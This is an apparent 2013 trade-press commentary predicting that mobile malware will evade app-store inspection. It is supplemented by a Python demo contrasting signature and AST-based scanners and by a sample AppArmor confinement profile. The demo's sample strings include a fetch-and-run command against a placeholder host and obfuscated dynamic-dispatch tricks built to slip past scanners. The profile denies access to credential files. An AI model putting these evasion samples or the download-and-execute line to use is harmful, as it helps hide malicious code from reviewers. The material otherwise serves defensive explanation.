Attacks/Breaches
10/7/2013
09:20 AM
Gunter Ollmann
Commentary

Distributing Malware Through Future App Stores

Difficult times ahead for app markets as professional malware developers ramp up their evasion techniques

As corporate networks continue to succumb to the bleating call of "bring your own device" (BYOD) gadgets, more security teams are questioning the security and integrity of the application markets that drive the adoption of these devices. While the vast majority of corporations have heard of the dangers of rogue app markets and the malware plague that infests them, many organizations continue to search for confirmation that the "legitimate" app stores are safe.

Numerous antivirus vendors have found it advantageous to monitor the many fledgling app stores and markets around the world, and they continue to publish their findings on the unique pieces of malware being uncovered. While the numbers follow a not-unexpected exponential growth rate, it remains unclear whether there is a significant (or even noticeable) threat to corporate entities -- especially if this maliciousness is almost entirely attributable to the aforementioned rogue markets.

It is inevitable that malware authors, and the criminal organizations that profit from malware's proliferation, will continue to pursue their targets via their portable and personal devices in order to breach an organization. The first and foremost defense against these attacks is likely to remain the app markets themselves -- at least for the short term. However, as malicious app developers are pushed and incentivized to innovate beyond this first generation of mobile malware in order to be reliably distributed from the primary app markets, it is inevitable that businesses will fall prey to more malware that targets their BYOD install base.

The primary app markets are well-positioned to limit the introduction of malicious software into their application portfolios. They all employ a barrage of technologies and service conditions designed to scan new applications (and their updates) for malicious code and unwanted actions. Many of the methods employed, by necessity, remain black-box systems to both their customers and their authorized app developers. While the primary app market providers will continue to improve their inspection techniques in the yo-yo battle against malicious developers, it is inevitable that they will lose that battle. It's just a matter of time, unfortunately.

Some may argue that the black-box inspection engines of the app market providers have the upper hand. I'd argue that if current corporate code inspection and review technologies are anything to go by, then the automated techniques used for testing the security and integrity of mobile applications will always succumb to even a marginally informed or persistent developer.

Today's commercial code analysis and inspection tools are fantastic for automatically plowing through millions of lines of code and flagging every poor coding choice that has historically been classed as a security concern. But, similar to the problems encountered with IDS and antivirus scanners, they're limited to pedantically detecting threats they've encountered before and are easily evaded when a modicum of obfuscation is employed. Even forgetting about the security angle for a moment -- speak with any experienced developer who has worked for a major software vendor about what they think of the automated build checkers and QA systems, and they'll happily tell you of the small tricks they had to employ to bypass those "hurdles to productivity."
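To make that evasion concrete, here is an added example that is not from the article and not from any app-store vendor's inspection platform: a toy review pass over four constructed Python snippets standing in for submitted app code (hypothetical, not real apps). A line-oriented signature scanner flags the plainly written call, and also a harmless comment, but misses the identical behaviour once the module name, function name and argument are assembled at run time. A second-generation check that parses the code and looks for the shape of dynamic dispatch (computed names passed to `__import__` and `getattr`, decoding of literals embedded in the app) catches that variant, and is in turn evaded by a third variant the heuristic has never seen. The sample sources, the signature patterns, the heuristic rules and the function names are all assumptions made for illustration.

```python
"""Added example: why a signature scanner is evaded by a modicum of obfuscation.

Not code from the article or from any app-store inspection platform. The
"submissions" below are constructed Python snippets; the signatures and the
AST heuristic are illustrative choices, not any vendor's rules.
"""
import ast
import base64
import re

# Constructed payload: the command every malicious sample ends up running.
PAYLOAD = b"curl http://updates.example/a.sh | sh"
B64 = base64.b64encode(PAYLOAD).decode()

SAMPLES = {
    # Plain call: any string signature catches this.
    "direct": 'import os\nos.system("curl http://updates.example/a.sh | sh")\n',
    # Same behaviour, with module, function and argument assembled at run time.
    "obfuscated": (
        "import base64\n"
        "m = __import__('o' + 's')\n"
        "f = getattr(m, 'sys' + 'tem')\n"
        f"f(base64.b64decode(b'{B64}').decode())\n"
    ),
    # Benign: the "bad" strings only appear in a comment.
    "benign": 'import os\n# TODO: never call os.system("curl ...") here\nprint(os.getcwd())\n',
    # Same behaviour again, built in a way the AST heuristic below does not know.
    "evaded": (
        "import importlib\n"
        "n = ''.join(map(chr, [111, 115]))\n"
        "m = importlib.import_module(n)\n"
        "vars(m)[''.join(map(chr, [115, 121, 115, 116, 101, 109]))]('id')\n"
    ),
}

# --- Generation one: known-bad strings -------------------------------------
SIGNATURES = [re.compile(p) for p in (r"\bos\.system\s*\(", r"\bcurl\b", r"\|\s*sh\b")]


def signature_scan(source):
    """Return 'line:pattern' hits for every known-bad string in the source."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for sig in SIGNATURES:
            if sig.search(line):
                hits.append(f"{lineno}:{sig.pattern}")
    return hits


# --- Generation two: the shape of dynamic dispatch --------------------------
DANGEROUS_CALLS = {"system", "popen", "exec", "eval"}
DECODERS = {"b64decode", "a85decode", "fromhex", "unhexlify"}


def _is_str_literal(node):
    return isinstance(node, ast.Constant) and isinstance(node.value, str)


class DispatchFinder(ast.NodeVisitor):
    """Flag direct dangerous calls, computed import/attribute names, and
    decoding of literals shipped inside the app (data, not user input)."""

    def __init__(self):
        self.findings = []

    def visit_Call(self, node):
        name = None
        if isinstance(node.func, ast.Name):
            name = node.func.id
        elif isinstance(node.func, ast.Attribute):
            name = node.func.attr
        line = node.lineno
        if name in DANGEROUS_CALLS:
            self.findings.append(f"{line}:direct call to {name}")
        if name == "__import__" and node.args and not _is_str_literal(node.args[0]):
            self.findings.append(f"{line}:__import__ with computed module name")
        if name == "getattr" and len(node.args) >= 2 and not _is_str_literal(node.args[1]):
            self.findings.append(f"{line}:getattr with computed attribute name")
        if name in DECODERS and node.args and isinstance(node.args[0], ast.Constant):
            self.findings.append(f"{line}:{name} of an embedded literal")
        self.generic_visit(node)


def ast_scan(source):
    """Return findings from the structural heuristic for the given source."""
    finder = DispatchFinder()
    finder.visit(ast.parse(source))
    return finder.findings


if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(f"{label:11s} signatures={len(signature_scan(src))} ast={len(ast_scan(src))}")
```

Run stand-alone, the script shows the pattern the paragraph describes: the "direct" sample trips three signatures and one structural finding, "benign" trips two signatures and no structural finding (a false positive the signature scanner cannot avoid), "obfuscated" trips no signatures but three structural findings, and "evaded" trips nothing in either pass. Each new rule is a response to a trick already seen; the developer who writes the next trick gets through until the rule set catches up.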

While automated security reviews can catch many of the common coding flaws and a growing list of obfuscation techniques, they are not capable of interpreting every logic jump or nested function call for deliberate maliciousness. One recent example can be found in the USENIX Security 2013 paper by Georgia Tech researchers Tielei Wang and colleagues, titled "Jekyll on iOS: When Benign Apps Become Evil," in which they deliberately inserted exploitable bugs into the code that was submitted to the Apple App Store, then triggered those bugs remotely after approval so that the app's own, individually benign code was rearranged into malicious behavior. The automated analysis platform employed by Apple to identify malicious apps had no realistic chance of identifying this evasion vector and, inevitably, the app was published to the store. The researchers withdrew it after testing it on their own devices, but it could just as easily have been installed by a new stable of victims.

The tricks employed by malicious app developers will grow in sophistication faster than even the most advanced app inspection and approval platforms can counter them.

For the time being, you may as well make the most of the fact that the primary app stores are largely ahead of the threat -- but don't become complacent. The advantage will soon fall to the attackers, and we can expect their mobile malware to become more prevalent in the markets we trust the most. Precisely when that'll happen and when we'll feel the pain remains uncertain, but a year or so is likely to be a good guess.

Gunter Ollmann, CTO, IOActive Inc.

Gunter Ollmann serves as CTO for IOActive Inc., where he is responsible for the strategic vision of the security services portfolio, driving new research areas and bringing new services to market. With over two decades in the information security arena, Gunter has stared down ...

Comments
Peter Fretty
User Rank: Apprentice
10/29/2013 | 10:54:14 PM
re: Distributing Malware Through Future App Stores
Such an important topic, especially as mobility continues to intensify and downloaded apps become a part of the organization fabric running business networks today. Beating malware is something that takes a strategy that utilizes a combination of solid tools, including device protection programs and UTM appliances (i.e. Sophos, etc.), as well as an education-based platform to continually educate the user base on best practices.

Peter Fretty
macker490
User Rank: Ninja
10/16/2013 | 11:16:41 AM
re: Distributing Malware Through Future App Stores
This is a topic that needs some serious thought and planning. We know there are disreputable software makers out there who attempt to put malware-loaded apps up on the program libraries so they are available for download.

Our response must consider as well that legitimate, well-intentioned software builders can load malware just as easily and without knowing it -- when the malware originates from a software library used in assembling a software product.

Software makers will need a zero-defects quality control process to fight this. Remember: zero defects is not something you get -- it's something you do: you make sure what you are shipping is defect-free -- and assume responsibility for that.

In Linux we have a tool known as AppArmor. Using this I can create a profile that will limit what an application can access. This is a very important concept.

Remember: when you open your computer and LOGON, it's then just you and your computer. But when you open your web browser it becomes you and the web author. Not just of the page you are browsing -- but every page the active page links to.

You can use AppArmor to restrict what an app can access. This can be a game-changer. No longer does an app have all the same access you do -- it can be restricted and allowed to access only those areas that are appropriate for it.

We will probably not be able to completely eliminate malware from the software distribution system. But an infected app should not be able to compromise your entire computer. A more traditional approach to computer security, such as adding AppArmor, as well as generally not allowing root access -- will be a huge step in the right direction. The old approach taken in the "PC" -- is an unmitigated disaster.
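As an added example of the confinement the commenter describes (not the commenter's own profile, and not from the article): a hypothetical AppArmor profile for an application installed at /usr/local/bin/exampleapp. The binary path, the configuration and state directories, the log file and the network needs are all assumptions; each would be replaced with what the real program actually touches.

```apparmor
# /etc/apparmor.d/usr.local.bin.exampleapp   (hypothetical program and paths)
#include <tunables/global>

/usr/local/bin/exampleapp {
  # Shared libraries, /dev/null, locale data and the like.
  #include <abstractions/base>
  # DNS and passwd/group lookups.
  #include <abstractions/nameservice>

  # The program itself: m = map as executable, r = read.
  /usr/local/bin/exampleapp mr,

  # Only what this program legitimately needs (assumed locations).
  /etc/exampleapp/** r,
  owner /var/lib/exampleapp/** rwk,
  /var/log/exampleapp.log w,
  network inet stream,
  network inet6 stream,

  # In enforce mode, anything not allowed above is already refused.
  # These explicit rules document intent, and the "audit" prefix makes
  # attempts show up in the kernel log, which a plain deny rule suppresses.
  audit deny @{HOME}/** rwklmx,
  audit deny /root/** rwklmx,
  audit deny /etc/shadow r,
  audit deny /proc/sys/** w,
  audit deny /usr/bin/** x,
  audit deny /bin/** x,
  deny capability,
  deny ptrace,
}
```

Load it with `apparmor_parser -r /etc/apparmor.d/usr.local.bin.exampleapp`, put it in complain mode first (`aa-complain /usr/local/bin/exampleapp`) and exercise the program while watching the kernel log (`dmesg` or `journalctl -k`) for lines of the form `apparmor="ALLOWED" operation="open" profile="/usr/local/bin/exampleapp" name="..."`; each one is an access the profile did not anticipate and must either be added or treated as suspect. Once the log is quiet, switch to `aa-enforce`, after which the same lines read `apparmor="DENIED"` and the access fails. The point the comment makes is visible in the last block: a compromised exampleapp that tries to read `~/.ssh` or spawn a shell from /bin is stopped and logged, even though the user running it has full access to both.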